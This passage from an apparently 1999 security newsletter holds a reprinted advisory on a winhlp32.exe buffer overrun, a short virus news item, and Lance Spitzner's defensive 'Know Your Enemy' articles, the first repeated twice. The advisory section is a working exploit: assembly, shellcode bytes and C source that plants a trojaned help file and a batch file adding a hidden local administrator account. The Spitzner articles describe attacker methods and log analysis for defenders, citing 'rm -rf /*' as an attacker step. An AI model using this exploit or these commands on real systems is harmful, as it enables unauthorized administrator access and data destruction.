- 08.0 WINHLP32.EXE BUFFER OVERRUN
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
- From http://www.net-security.org/
-
- by BHZ, Tuesday 25th May 1999 on 1.01 am CET
- David Litchfield aka Mnemonix wrote an advisory on winhlp32.exe buffer overrun. "The
- buffer overrun in winhlp32.exe occurs when it attempts to read a cnt file with an overly
- long heading string. If the string is longer than 507 bytes the buffer overrun does not
- occur - winhlp32 just truncates the entry." Read the advisory below.
-
- Analysis of the winhlp32.exe buffer overrun.
-
- The buffer overrun in winhlp32.exe occurs when it attempts to read a cnt
- file with an overly long heading string. If the string is longer than 507
- bytes the buffer overrun does not occur - winhlp32 just truncates the entry.
- The return address is overwritten with bytes 357, 358, 359 and 360.
- Everything before these bytes is lost giving us bytes 361 to 507 to play
- with - a total of 147 bytes for our exploit code. On playing around with the
- overrun we find we lose about another 20 of these bytes giving us only 127
- bytes to play with - not a lot really.
-
- On overruning the buffer and analysing the contents of memory and the CPU's
- registers with a debugger we find that byte 361 is found at 0x0012F0E4. This
- is the address we need to get the processor to go to to get its next
- instruction - but this address has a NULL in it which totally messes things
- up. However, looking at the registers we can see that the ESP, the Stack
- Pointer, holds this address so if we can find somewhere in memory that does
- a JMP ESP, and set the return address to this then we should be able to get
- back to the address where we'll place our exploit code. Looking at the DLLs
- that winhlp32.exe uses we find that kernel32.dll has the JMP ESP instruction
- at 0x77F327E5 (Service Pack 4's version of kernel32.lib - I think it's at
- 0x77F327D5 on Service Pack 3's kernel32.dll).
-
- So we put 0x77F327E5 into bytes 357 to 360 but we have to load it in
- backwards so byte 357 we'll set to 0xE5, byte 358 to 0x27, byte 359 to 0xF3
- and byte 360 to 0x77.
-
- Now we've jumped back to our exploit code we have to decide what we wan to
- put in it. Because we only have 127 bytes to do anything meaningful we need
- to start another program - the best thing is to get it to run a batch file.
- This means calling the system ( ) function which is exported by msvcrt.dll
- which isn't loaded into the address space of winhlp32.exe - so we'll have to
- load it. How do we do this? We have to call LoadLibrary ( ) which is
- exported by kernel32.dll which is in the address space. LoadLibraryA ( ) is
- exported at address 0x77F1381A so all we need to do is have the string
- "msvcrt.dll" in memory somewhere and call 0x77F1381A with a reference to the
- pointer to the null terminated "msvcrt.dll" string. Because it has to be
- null terminated we'll get our code to write it into memory. Once this is
- done we'll place the address of LoadLibraryA ( ) onto the stack then place
- the address of the pointer to "msvcrt.dll" and finally call LoadLibraryA ( )
- using an offset from the EBP. The following is the Assembly Code needed to
- do this:
-
- /*First the procedure prologue */
- push ebp
- mov ebp,esp
-
- /*Now we need some zeroes */
- xor eax,eax
-
- /* and then push then onto the stack */
- push eax
- push eax
- push eax
-
- /* Now we write MSVCRT.DLL into the stack */
- mov byte ptr[ebp-0Ch],4Dh
- mov byte ptr[ebp-0Bh],53h
- mov byte ptr[ebp-0Ah],56h
- mov byte ptr[ebp-09h],43h
- mov byte ptr[ebp-08h],52h
- mov byte ptr[ebp-07h],54h
- mov byte ptr[ebp-06h],2Eh
- mov byte ptr[ebp-05h],44h
- mov byte ptr[ebp-04h],4Ch
- mov byte ptr[ebp-03h],4Ch
-
- /* move the address of LoadLibraryA ( ) into the edx register */
- mov edx,0x77F1381A
-
- /* and then push it onto the stack */
- push edx
-
- /* Then we load the address where the msvcrt.dll string can be found */
- lea eax,[ebp-0Ch]
-
- /* and push it onto the stack */
- push eax
-
- /* Finally we call LoadLibraryA( )
- call dword ptr[ebp-10h]
-
- All things going well we should have now loaded msvcrt.dll into the address
- space of winhlp32.exe. With this in place we now need to call system() and
- provide the name of a batch file to it as an argument. We don't have enough
- bytes to play with to call GetProcessAddress ( ) and do the rest of the
- things we have to do like clean up so we check what version of msvcrt.dll we
- have before writing the code and see where system ( ) is exported at. On a
- standard install of Windows NT this will normally be version 4.20.6201 with
- system () exported at 0x7801E1E1. We'll call the batch file ADD.bat but to
- save room we won't give it an extention. The system ( ) function will try
- the default executable extentions like.exe, .com and .bat and find it for us
- then run it. Once it has run it the cmd.exe process system( ) has launched
- will exit.
-
- So we need to have the null terminated string "ADD" in memory and the
- address of system ( ). Below is the code that will write "ADD" onto the
- stack and then call system( )
-
- /*First the procedure prologue */
- push ebp
- mov ebp,esp
-
- /* We need some NULL and then push them onto the stack */
- xor edi,edi
- push edi
-
- /* Now we write ADD onto the stack */
- mov byte ptr [ebp-04h],41h
- mov byte ptr [ebp-03h],44h
- mov byte ptr [ebp-02h],44h
-
- /* Place address of system ( ) into eax and push it onto the stack */
- mov eax, 0x7801E1E1
- push eax
-
- /* Now load eax with address of ADD and push this too */
- lea eax,[ebp-04h]
- push eax
-
- / * Then we call system ( ) */
- call dword ptr [ebp-08h]
-
- Once the batch file has been run the Command Interpreter will exit and if we
- don't clean up after ourselves winhlp32.exe will access violate so we need
- to call exit (0) to keep it quiet. exit ( ) is also exported by msvcrt.dll
- at address 0x78005BBA - which has a null in it. It's not a major problem -
- we can fill a register with 0xFFFFFFFF and subtract 0x87FFA445 from it. The
- following code calls exit (0)
-
-
- /* Procedure prologue */
- push ebp
- mov ebp,esp
-
- /* Round about way of getting address of exit () into edx */
- mov edx,0xFFFFFFFF
- sub edx,0x87FFAF65
-
- /* Push this address onto the stack */
- push edx
-
- /* Get some nulls - this is our exit code - and push them too */
- xor eax,eax
- push eax
-
- /* then call exit()! */
- call dword ptr[ebp-04h]
-
- Altogether our code looks like this:
-
- push ebp
- mov ebp,esp
- xor eax,eax
- push eax
- push eax
- push eax
- mov byte ptr[ebp-0Ch],4Dh
- mov byte ptr[ebp-0Bh],53h
- mov byte ptr[ebp-0Ah],56h
- mov byte ptr[ebp-09h],43h
- mov byte ptr[ebp-08h],52h
- mov byte ptr[ebp-07h],54h
- mov byte ptr[ebp-06h],2Eh
- mov byte ptr[ebp-05h],44h
- mov byte ptr[ebp-04h],4Ch
- mov byte ptr[ebp-03h],4Ch
- mov edx,0x77F1381A
- push edx
- lea eax,[ebp-0Ch]
- push eax
- call dword ptr[ebp-10h]
- push ebp
- mov ebp,esp
- xor edi,edi
- push edi
- mov byte ptr [ebp-04h],43h
- mov byte ptr [ebp-03h],4Dh
- mov byte ptr [ebp-02h],44h
- mov eax, 0x7801E1E1
- push eax
- lea eax,[ebp-04h]
- push eax
- call dword ptr [ebp-08h]
- push ebp
- mov ebp,esp
- mov edx,0xFFFFFFFF
- sub edx,0x87FFA445
- push edx
- xor eax,eax
- push eax
- call dword ptr[ebp-04h]
-
- Now we need the operayion codes (opcodes) for all this which we do by
- writing a program that uses the __asm function and then debug it. This is
- what we actually load into our exploit code.
-
- Following is the source of a program that will create a "trojaned"
- wordpad.cnt. It will also create a batch file called add.bat - edit it as
- you see fit. I have compiled the program - you can get a copy of it from
-
- http://www.infowar.co.uk/mnemonix/winhlpadd.exe
-
- Note that this will run only on standard installs of NT with service pack 4
- and expects an msvcrt.dll version of 4.20.6201 - run it from the winnt\help
- directory.
-
- Cheers,
- David Litchfield
- http://www.infowar.co.uk/mnemonix
- http://www.arca.com
-
-
-
- #include
- #include
- #include
-
- int main(void)
- {
- char eip[5]="\xE5\x27\xF3\x77";
- char
- ExploitCode[200]="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
- 90\x90\x90\x90\x90\x90\x55\x8B\xEC\x33\xC0\x50\x50\x50\xC6\x45\xF4\x4D\xC6\x
- 45\xF5\x53\xC6\x45\xF6\x56\xC6\x45\xF7\x43\xC6\x45\xF8\x52\xC6\x45\xF9\x54\x
- C6\x45\xFA\x2E\xC6\x45\xFB\x44\xC6\x45\xFC\x4C\xC6\x45\xFD\x4C\xBA\x1A\x38\x
- F1\x77\x52\x8D\x45\xF4\x50\xFF\x55\xF0\x55\x8B\xEC\x33\xFF\x57\xC6\x45\xFC\x
- 41\xC6\x45\xFD\x44\xC6\x45\xFE\x44\xB8\xE1\xE1\xA0\x77\x50\x8D\x45\xFC\x50\x
- FF\x55\xF8\x55\x8B\xEC\xBA\xBA\x5B\x9F\x77\x52\x33\xC0\x50\xFF\x55\xFC";
-
- FILE *fd;
- printf("\n\n*******************************************************\n");
- printf("* WINHLPADD exploits a buffer overrun in Winhlp32.exe *\n");
- printf("* This version runs on Service Pack 4 machines and *\n");
- printf("* assumes a msvcrt.dll version of 4.00.6201 *\n");
- printf("* *\n");
- printf("* (C) David Litchfield (mnemonix@globalnet.co.uk) '99 *\n");
- printf("*******************************************************\n\n");
-
- fd = fopen("wordpad.cnt", "r");
- if (fd==NULL)
- {
- printf("\n\nWordpad.cnt not found or insufficient rights to access
- it.\nRun this from the WINNT\\HELP directory");
- return 0;
- }
- fclose(fd);
- printf("\nMaking a copy of real wordpad.cnt - wordpad.sav\n");
- system("copy wordpad.cnt wordpad.sav");
- printf("\n\nCreating wordpad.cnt with exploit code...");
- fd = fopen("wordpad.cnt", "w+");
- if (fd==NULL)
- {
- printf("Failed to open wordpad.cnt in write mode. Check you have
- sufficent rights\n");
- return 0;
- }
- fprintf(fd,"1
- AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
- AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
- AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
- AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
- AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%s%s\n",eip,ExploitCode)
- ;
- fprintf(fd,"2 Opening a document=WRIPAD_OPEN_DOC\n");
- fclose(fd);
- printf("\nCreating batch file add.bat\n\n");
- fd = fopen("add.bat", "w");
- if (fd == NULL)
- {
- printf("Couldn't create batch file. Manually create one instead");
- return 0;
- }
- printf("The batch file will attempt to create a user account called
- \"winhlp\" and\n");
- printf("with a password of \"winhlp!!\" and add it to the Local
- Administrators group.\n");
- printf("Once this is done it will reset the files and delete itself.\n");
- fprintf(fd,"net user winhlp winhlp!! /add\n");
- fprintf(fd,"net localgroup administrators winhlp /add\n");
- fprintf(fd,"del wordpad.cnt\ncopy wordpad.sav wordpad.cnt\n");
- fprintf(fd,"del wordpad.sav\n");
- fprintf(fd,"del add.bat\n");
- fclose(fd);
- printf("\nBatch file created.");
- printf("\n\nCreated. Now open up Wordpad and click on Help\n");
-
- return 0;
-
-
- }
-
- @HWA
-
- 09.0 NAI ON GALADRIEL VIRUS
- ~~~~~~~~~~~~~~~~~~~~~~
-
- From http://www.net-security.org/
-
- by BHZ, Saturday 22nd May 1999 on 12.18 pm CET
- Couple of days ago we wrote about Galadriel virus. This virus infects files with the
- CSC extension when an infected script is run from under CorelDraw and Corel Photo
- Paint 7, 8 and 9. A user is likely to notice the presence of the virus because many
- scripts stop executing properly when infected and a CorelDraw error message will
- occur. The CSC/CSV.A virus does not work under the WordPerfect suite as this suite
- uses a different language than the Corel script. NAI categorized this virus as Low risk,
- and you could update your VirusScan with these patches: VirusScan 3 & VirusScan 4.0
-
- @HWA
-
- 10.0 Know your enemy parts 1,2 and 3
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
- Part 1
-
- The Attack of the Script Kiddie
- Know Your Enemy
-
- Lance Spitzner
- Last Modified: May 23, 1999
-
- My commander used to tell me that to secure yourself against the enemy, you have to first know who your enemy
- is. This military doctrine readily applies to the world of network security. Just like the military, you have resources
- that you are trying to protect. To help protect these resources, you need to know who your threat is and how they
- are going to attack. This article does just that, it discusses the methodology and tools used by one of the most
- common and universal threats, the Script Kiddie.
-
- Who is the Script Kiddie
-
- The script kiddie is someone looking for the easy kill. They are not out for specific information or targeting a specific company.
- Their goal is to gain root the easiest way possible. They do this by focusing on a small number of exploits, and then searching
- the entire Internet for that exploit. Sooner or later they find someone vulnerable.
-
- Some of them are advance users who develop their own tools and leave behind sophisticated backdoors. Others have no idea
- what they are doing and only know how to type "go" at the command prompt. Regardless of the their skill level, they all share a
- common strategy, randomly search for a specific weakness, then exploit that weakness.
-
- The Threat
-
- It is this random selection of targets that make the script kiddie such a dangerous threat. Sooner or later your systems and
- networks will be probed, you cannot hide from them. I know of admins who were amazed to have their systems scanned when
- they had been up for only two days, and no one knew about them. There is nothing amazing here. Most likely, their systems
- were scanned by a script kiddie who happened to be sweeping that network block.
-
- If this was limited to several individual scans, statistics would be in your favor. With millions of systems on the Internet, odds
- are that no one would find you. However, this is not the case. Most of these tools are easy to use and widely distributed,
- anyone can use them. A rapidly growing number of people are obtaining these tools at an alarming rate. As the Internet knows
- no geographic bounds, this threat has quickly spread throughout the world. Suddenly, the law of numbers is turning against us.
- With so many users on the Internet using these tools, it is no longer a question of if, but when you will be probed.
-
- This is an excellent example of why security through obscurity can fail you. You may believe that if no one knows about your
- systems, you are secure. Others believe that their systems are of no value, so why would anyone probe them? It is these very
- systems that the script kiddies are searching for, the unprotected system that is easy to exploit, the easy kill.
-
- The Methodology
-
- The script kiddie methodology is a simple one. Scan the Internet for a specific weakness, when you find it, exploit it. Most of
- the tools they use are automated, requiring little interaction. You launch the tool, then come back several days later to get your
- results. No two tools are alike, just as no two exploits are alike. However, most of the tools use the same strategy. First,
- develop a database of IPs that can be scanned. Then, scan those IPs for a specific vulnerability.
-
- For example, lets say a user had a tool that could exploit imap on Linux systems, such as imapd_exploit.c. First, they would
- develop a database of IP addresses that they could scan (i.e., systems that are up and reachable). Once this database of IP
- addresses is built, the user would want to determine which systems were running Linux. Many scanners today can easily
- determine this by sending bad packets to a system and seeing how they respond, such as Fyodor's nmap. Then, tools would be
- used to determine what Linux systems were running imap. All that is left now is to exploit those vulnerable systems.
-
- You would think that all this scanning would be extremely noisy, attracting a great deal of attention. However, many people are
- not monitoring there systems, and do not realize they are being scanned. Also, many script kiddies quietly look for a single
- system they can exploit. Once they have exploited a system, they now use this systems as a launching pad. They can boldly
- scan the entire Internet without fear of retribution. If their scans are detected, the system admin and not the blackhat will be held
- liable.
-
- Also, these scan results are often archived or shared among other users, then used at a later date. For example, a user
- develops a database of what ports are open on reachable Linux systems. The user built this database to exploit the current
- imap vulnerability. However, lets say that a month from now a new Linux exploit is identified on a different port. Instead of
- having to build a new database (which is the most time consuming part), the user can quickly review his archived database and
- compromise the vulnerable systems. As an alternative, script kiddies share or even buy databases of vulnerable systems from
- each other. The script kiddie can then exploit your system without even scanning it. Just because your systems have not been
- scanned recently does not mean you are secure.
-
- The more sophisticated blackhats implement trojans and backdoors once they compromise a system. Backdoors allow easy
- and unnoticed access to the system whenever the user wants. The trojans make the intruder undetectable. He would not show
- up in any of the logs, systems processes, or file structure. He builds a comfortable and safe home where he can blatantly scan
- the Internet. For more information on this, check out Know Your Enemy: III.
-
- These attacks are not limited to a certain time of the day. Many admins search their log entries for probes that happen late at
- night, believing this is when blackhats attack. Script kiddies attack at any time. As they are scanning 24hrs a day, you have no
- idea when the probe will happen. Also, these attacks are launched throughout the world. Just as the Internet knows no
- geographical bounds, it knows no time zones. It may be midnight where the blackhat is, but it is 1pm for you.
-
- The Tools
-
- The tools used are extremely simple in use. Most are limited to a single purpose with few options. First come the tools used to
- build an IP database. These tools are truly random, as they indiscriminently scan the Internet. For example, one tool has a single
- option, A, B, or C. The letter you select determines the size of the network to be scanned. The tool then randomly selects
- which IP network to scan. Another tool uses a domain name (z0ne is an excellent example of this). The tools builds an IP
- database by conducting zone transfers of the domain name and all sub-domains. User's have built databases with over 2 million
- IPs by scanning the entire .com or .edu domain.
-
- Once discovered, the IPs are then scanned by tools to determine vulnerabilities, such as the version of named, operating
- system, or services running on the system Once the vulnerable systems have been identified, the blackhat strikes. Several tools
- exist that combine all these features together, simplifying the process even greater, such as sscan by jsbach. For a better
- understanding of how these tools are used, check out Know Your Enemy: II.
-
- How to Protect Against This Threat
-
- There are steps you can take to protect yourself against this threat. First, the script kiddie is going for the easy kill, they are
- looking for common exploits. Make sure your systems and networks are not vulnerable to these exploits. Both
- http://www.cert.org and http://www.ciac.org are excellent sources on what a common exploit is. Also, the listserv bugtraq is
- one of the best sources of information.
-
- Another way to protect yourself is run only the services you need. If you do not need a service, turn it off. If you do need a
- service, make sure it is the latest version. For examples on how to do this, check out Armoring Solaris , Armoring Linux or
- Armoring NT.
-
- As you learned from the tools section, DNS servers are often used to develop a database of systems that can be probed. Limit
- the systems that can conduct zone transfers from your Name Servers. Log any unauthorized zone transfers and follow up on
- them. I highly recommend upgrading to the latest version of BIND (software used for Domain Name Service), which you can
- find at http://www.isc.org/bind.html.
-
- Last, watch for your systems being probed. Once identified, you can track these probes and gain a better understanding of the
- threats to your network and react to these threats.
-
- Conclusion
-
- The script kiddie poses a threat to all systems. They show no bias and scan all systems, regardless of location and value.
- Sooner or later, your system will be probed. By understanding their motives and methods, you can better protect your systems
- against this threat.
-
- NOTE: Thanks to Brad Powell at Sun's Security Team for his help on this article
-
- Author's bio
- Lance Spitzner enjoys learning by blowing up his Unix systems at home. Before this, he was an Officer in the Rapid
- Deployment Force, where he blew up things of a different nature. You can reach him at lance@spitzner.net .
-
-
- Whitepapers / Publications
-
- The Attack of the Script Kiddie
- Know Your Enemy
-
- Lance Spitzner
- Last Modified: May 23, 1999
-
- My commander used to tell me that to secure yourself against the enemy, you have to first know who your enemy
- is. This military doctrine readily applies to the world of network security. Just like the military, you have resources
- that you are trying to protect. To help protect these resources, you need to know who your threat is and how they
- are going to attack. This article does just that, it discusses the methodology and tools used by one of the most
- common and universal threats, the Script Kiddie.
-
- Who is the Script Kiddie
-
- The script kiddie is someone looking for the easy kill. They are not out for specific information or targeting a specific company.
- Their goal is to gain root the easiest way possible. They do this by focusing on a small number of exploits, and then searching
- the entire Internet for that exploit. Sooner or later they find someone vulnerable.
-
- Some of them are advance users who develop their own tools and leave behind sophisticated backdoors. Others have no idea
- what they are doing and only know how to type "go" at the command prompt. Regardless of the their skill level, they all share a
- common strategy, randomly search for a specific weakness, then exploit that weakness.
-
- The Threat
-
- It is this random selection of targets that make the script kiddie such a dangerous threat. Sooner or later your systems and
- networks will be probed, you cannot hide from them. I know of admins who were amazed to have their systems scanned when
- they had been up for only two days, and no one knew about them. There is nothing amazing here. Most likely, their systems
- were scanned by a script kiddie who happened to be sweeping that network block.
-
- If this was limited to several individual scans, statistics would be in your favor. With millions of systems on the Internet, odds
- are that no one would find you. However, this is not the case. Most of these tools are easy to use and widely distributed,
- anyone can use them. A rapidly growing number of people are obtaining these tools at an alarming rate. As the Internet knows
- no geographic bounds, this threat has quickly spread throughout the world. Suddenly, the law of numbers is turning against us.
- With so many users on the Internet using these tools, it is no longer a question of if, but when you will be probed.
-
- This is an excellent example of why security through obscurity can fail you. You may believe that if no one knows about your
- systems, you are secure. Others believe that their systems are of no value, so why would anyone probe them? It is these very
- systems that the script kiddies are searching for, the unprotected system that is easy to exploit, the easy kill.
-
- The Methodology
-
- The script kiddie methodology is a simple one. Scan the Internet for a specific weakness, when you find it, exploit it. Most of
- the tools they use are automated, requiring little interaction. You launch the tool, then come back several days later to get your
- results. No two tools are alike, just as no two exploits are alike. However, most of the tools use the same strategy. First,
- develop a database of IPs that can be scanned. Then, scan those IPs for a specific vulnerability.
-
- For example, lets say a user had a tool that could exploit imap on Linux systems, such as imapd_exploit.c. First, they would
- develop a database of IP addresses that they could scan (i.e., systems that are up and reachable). Once this database of IP
- addresses is built, the user would want to determine which systems were running Linux. Many scanners today can easily
- determine this by sending bad packets to a system and seeing how they respond, such as Fyodor's nmap. Then, tools would be
- used to determine what Linux systems were running imap. All that is left now is to exploit those vulnerable systems.
-
- You would think that all this scanning would be extremely noisy, attracting a great deal of attention. However, many people are
- not monitoring there systems, and do not realize they are being scanned. Also, many script kiddies quietly look for a single
- system they can exploit. Once they have exploited a system, they now use this systems as a launching pad. They can boldly
- scan the entire Internet without fear of retribution. If their scans are detected, the system admin and not the blackhat will be held
- liable.
-
- Also, these scan results are often archived or shared among other users, then used at a later date. For example, a user
- develops a database of what ports are open on reachable Linux systems. The user built this database to exploit the current
- imap vulnerability. However, lets say that a month from now a new Linux exploit is identified on a different port. Instead of
- having to build a new database (which is the most time consuming part), the user can quickly review his archived database and
- compromise the vulnerable systems. As an alternative, script kiddies share or even buy databases of vulnerable systems from
- each other. The script kiddie can then exploit your system without even scanning it. Just because your systems have not been
- scanned recently does not mean you are secure.
-
- The more sophisticated blackhats implement trojans and backdoors once they compromise a system. Backdoors allow easy
- and unnoticed access to the system whenever the user wants. The trojans make the intruder undetectable. He would not show
- up in any of the logs, systems processes, or file structure. He builds a comfortable and safe home where he can blatantly scan
- the Internet. For more information on this, check out Know Your Enemy: III.
-
- These attacks are not limited to a certain time of the day. Many admins search their log entries for probes that happen late at
- night, believing this is when blackhats attack. Script kiddies attack at any time. As they are scanning 24hrs a day, you have no
- idea when the probe will happen. Also, these attacks are launched throughout the world. Just as the Internet knows no
- geographical bounds, it knows no time zones. It may be midnight where the blackhat is, but it is 1pm for you.
-
- The Tools
-
- The tools used are extremely simple in use. Most are limited to a single purpose with few options. First come the tools used to
- build an IP database. These tools are truly random, as they indiscriminently scan the Internet. For example, one tool has a single
- option, A, B, or C. The letter you select determines the size of the network to be scanned. The tool then randomly selects
- which IP network to scan. Another tool uses a domain name (z0ne is an excellent example of this). The tools builds an IP
- database by conducting zone transfers of the domain name and all sub-domains. User's have built databases with over 2 million
- IPs by scanning the entire .com or .edu domain.
-
- Once discovered, the IPs are then scanned by tools to determine vulnerabilities, such as the version of named, operating
- system, or services running on the system Once the vulnerable systems have been identified, the blackhat strikes. Several tools
- exist that combine all these features together, simplifying the process even greater, such as sscan by jsbach. For a better
- understanding of how these tools are used, check out Know Your Enemy: II.
-
- How to Protect Against This Threat
-
- There are steps you can take to protect yourself against this threat. First, the script kiddie is going for the easy kill, they are
- looking for common exploits. Make sure your systems and networks are not vulnerable to these exploits. Both
- http://www.cert.org and http://www.ciac.org are excellent sources on what a common exploit is. Also, the listserv bugtraq is
- one of the best sources of information.
-
- Another way to protect yourself is run only the services you need. If you do not need a service, turn it off. If you do need a
- service, make sure it is the latest version. For examples on how to do this, check out Armoring Solaris , Armoring Linux or
- Armoring NT.
-
- As you learned from the tools section, DNS servers are often used to develop a database of systems that can be probed. Limit
- the systems that can conduct zone transfers from your Name Servers. Log any unauthorized zone transfers and follow up on
- them. I highly recommend upgrading to the latest version of BIND (software used for Domain Name Service), which you can
- find at http://www.isc.org/bind.html.
-
- Last, watch for your systems being probed. Once identified, you can track these probes and gain a better understanding of the
- threats to your network and react to these threats.
-
- Conclusion
-
- The script kiddie poses a threat to all systems. They show no bias and scan all systems, regardless of location and value.
- Sooner or later, your system will be probed. By understanding their motives and methods, you can better protect your systems
- against this threat.
-
- NOTE: Thanks to Brad Powell at Sun's Security Team for his help on this article
-
- Author's bio
- Lance Spitzner enjoys learning by blowing up his Unix systems at home. Before this, he was an Officer in the Rapid
- Deployment Force, where he blew up things of a different nature. You can reach him at lance@spitzner.net .
-
- Part 2
-
- Tracking their moves
- Know Your Enemy: II
-
- Lance Spitzner
- Last Modified: May 23, 1999
-
- In the first article, Know Your Enemy, we covered the tools and methodologies of the Script Kiddie. Specifically,
- how they probe for vulnerabilities and then attack. Now we will cover how to track their movements. Just as in
- the military, you want to track the bad guys and know what they are doing. We will cover what you can, and cannot
- determine, with your system logs. You may be able to determine if you are being probed, what you were being
- probed for, what tools were used, and if they successful. The examples provided here focus on Linux, but can
- apply to almost any flavor of Unix. Keep in mind, there is no guaranteed way to track the enemy's every step.
- However, this article is a good place to start.
-
- Securing Your Logs
- This article is not on Intrusion Detection, there are a variety of excellent sources that cover IDS. If you are interested in
- intrusion detection, I recommend checking out applicatons such as Network Flight Recorder or swatch. This article focuses
- on intelligence gathering. Specifically, how to figure out what the enemy is doing by reviewing your system logs. You will be
- surprised how much information you will find in your own log files. However, before we can talk about reviewing your logs, we
- first have to discuss securing your system logs. Your log files are worthless if you cannot trust the integrity of them. The first
- thing most blackhats do is alter log files on a compromised system. There are a variety of rootkits that will wipe out their
- presence from log files (such as cloak), or alter logging all together (such as trojaned syslogd binaries). So, the first step to
- reviewing your logs is securing your logs.
-
- This means you will need to use a remote log server. Regardless of how secure your system is, you cannot trust your logs on a
- compromised system. If nothing else, the blackhat can simply do a rm -rf /* on your system, wiping you hard drive clean.
- This makes recovering your logs somewhat difficult. To protect against this, you will want all your systems to log traffic both
- locally and to a remote log server. I recommend making your log server a dedicated system, ie. the only thing it should be
- doing is collecting logs from other systems.. If money is an issue, you can easily build a linux box to act as your log server.
- This server should be highly secured, with all services shut off, allowing only console access (see Armoring Linux for an
- example). Also, ensure that port 514 UDP is blocked or firewalled at your Internet connection. This protects your log server
- from receiving bad or un-authorized logging information from the Internet.
-
- For those of you who like to get sneaky, something I like to do is recompile syslogd to read a different configuration file, such
- as /var/tmp/.conf. This way the blackhat does not realize where the real configuration file is. This is simply done by changing
- the entry "/etc/syslog.conf" in the source code to whatever file you want. We then setup our new configuration file to log both
- locally and to the remote log server (see example). Make sure you maintain a standard copy of the configuration file,
- /etc/syslog.conf, which points to all local logging. Even though this configuration file is now useless, this will throw off the
- blackhat from realizing the true destination of our remote logging. Another option for your systems is to use a secure method of
- logging. One option is to replace your syslogd binary with something that has integrity checking and a greater breadth of
- options. One option is syslog-ng, which you can find at http://www.balabit.hu/products/syslog-ng.html
-
-
- Most of the logs we will use are the ones stored on the remote log server. As mentioned earlier, we can be fairly confident of
- the integrity of these logs since they are on a remote and secured system. Also, since all systems are logging to a single source,
- it is much easier to identify patterns in these logs. We can quickly review what's happening to all the systems in one source.
- The only time you would want to review logs stored locally on a system is to compare them to what the log server has. You
- can determine if the local logs have been altered by comparing them to the remote logs.
-
- Pattern Matching
- By looking at your log entries, you can usually determine if you are being port scanned. Most Script Kiddies scan a network
- for a single vulnerability. If your logs show most of your systems being connected from the same remote system, on the same
- port, this is most likely an exploit scan. Basically, the enemy has an exploit for a single vulnerability, and they are scanning your
- network for it. When they find it, they exploit it. For most Linux systems, TCP Wrappers is installed be default. So, we
- would find most of these connections in /var/log/secure. For other flavors of Unix, we can log all inetd connections by
- launching inetd with the "-t" flag., facility daemon. A typical exploit scan would look like something below. Here we have a
- source scanning for the wu-ftpd vulnerability.
-
- /var/log/secure
- Apr 10 13:43:48 mozart in.ftpd[6613]: connect from 192.168.11.200
- Apr 10 13:43:51 bach in.ftpd[6613]: connect from 192.168.11.200
- Apr 10 13:43:54 hadyen in.ftpd[6613]: connect from 192.168.11.200
- Apr 10 13:43:57 vivaldi in.ftpd[6613]: connect from 192.168.11.200
- Apr 10 13:43:58 brahms in.ftpd[6613]: connect from 192.168.11.200
-
- Here we see the source 192.168.11.200 scanning our network. Notice how the source sequentially scans each IP (this is
- not always the case). This is the advantage of having a log server, you can more easily identify patterns in your network since
- all the logs are combined. The repeated connections to port 21, ftp, indicated they were most likely looking for the wu-ftpd
- exploit. We have just determined what the blackhat is looking for. Often, scans tend to come in phases. Someone will release
- code for an imap exploit, you will suddenly see a rush of imaps scans in your logs. The next month you will be hit by ftp. An
- excellent source for current exploits is http://www.cert.org/advisories/ Sometimes, tools will scan for a variety of exploits at
- the same time, so you may see a single source connecting to several ports.
-
- Keep in mind, if you are not logging the service, you will not know if you are scanned for it. For example, most rpc
- connections are not logged. However, many services can simply be added to /etc/inetd.conf for logging with TCP Wrappers.
- For example, you can add an entry in /etc/inetd.conf for NetBus. You can define TCP Wrappers to safely deny and log the
- connections (see Intrusion Detection for more info on this).
-
- What's the Tool?
- Sometimes you can actually determine the tools being used to scan your network. Some of the more basic tools scan for a
- specific exploit, such as ftp-scan.c. If only a single port or vulnerability is being probed on your network, they are most likely
- using one of these "single mission" tools. However, there exist tools that probe for a variety of vulnerabilities or weaknesses,
- the two most popular are sscan by jsbach and nmap by Fyodor. I've selected these two tools because they represent the two
- "categories" of scanning tools. I highly recommend you run these tools against your own network, you may be surprised by the
- results :)
-
- sscan represents the "all purpose" Script Kiddie scanning tool, and its probably one of the best ones out there. It quickly
- probes a network for a variety of vulnerabilities (including cgi-bin). It is easily customizable, allowing you to add probes
- for new exploits. You just give the tool a network and network mask, and it does the rest for you. However, the user
- must be root to use it. The output is extremely easy to interpret (hence making it so popular): It gives a concise
- summary of many vulnerable services. All you have to do is run sscan against a network, grep for the word "VULN" in
- the output, and then run the "exploit du jour". Below is an example of sscan ran against the system mozart
- (172.17.6.30).
-
- otto #./sscan -o 172.17.6.30
-
- --------------------------<[ * report for host mozart *
- <[ tcp port: 80 (http) ]> <[ tcp port: 23 (telnet) ]>
- <[ tcp port: 143 (imap) ]> <[ tcp port: 110 (pop-3) ]>
- <[ tcp port: 111 (sunrpc) ]> <[ tcp port: 79 (finger) ]>
- <[ tcp port: 53 (domain) ]> <[ tcp port: 25 (smtp) ]>
- <[ tcp port: 21 (ftp) ]>
- --<[ *OS*: mozart: os detected: redhat linux 5.1
- mozart: VULN: linux box vulnerable to named overflow.
- -<[ *CGI*: 172.17.6.30: tried to redirect a /cgi-bin/phf request.
- -<[ *FINGER*: mozart: root: account exists.
- --<[ *VULN*: mozart: sendmail will 'expn' accounts for us
- --<[ *VULN*: mozart: linux bind/iquery remote buffer overflow
- --<[ *VULN*: mozart: linux mountd remote buffer overflow
- ---------------------------<[ * scan of mozart completed *
-
- Nmap represents the "raw data" tool set. It doesn't tell you what vulnerabilities exist, rather, it tells you what ports are
- open, you determine the security impact. Nmap has quickly become the port scanner of choice, and with good reason.
- It takes the best of a variety of port scanners and puts all their functionality into a single tool, including OS detection,
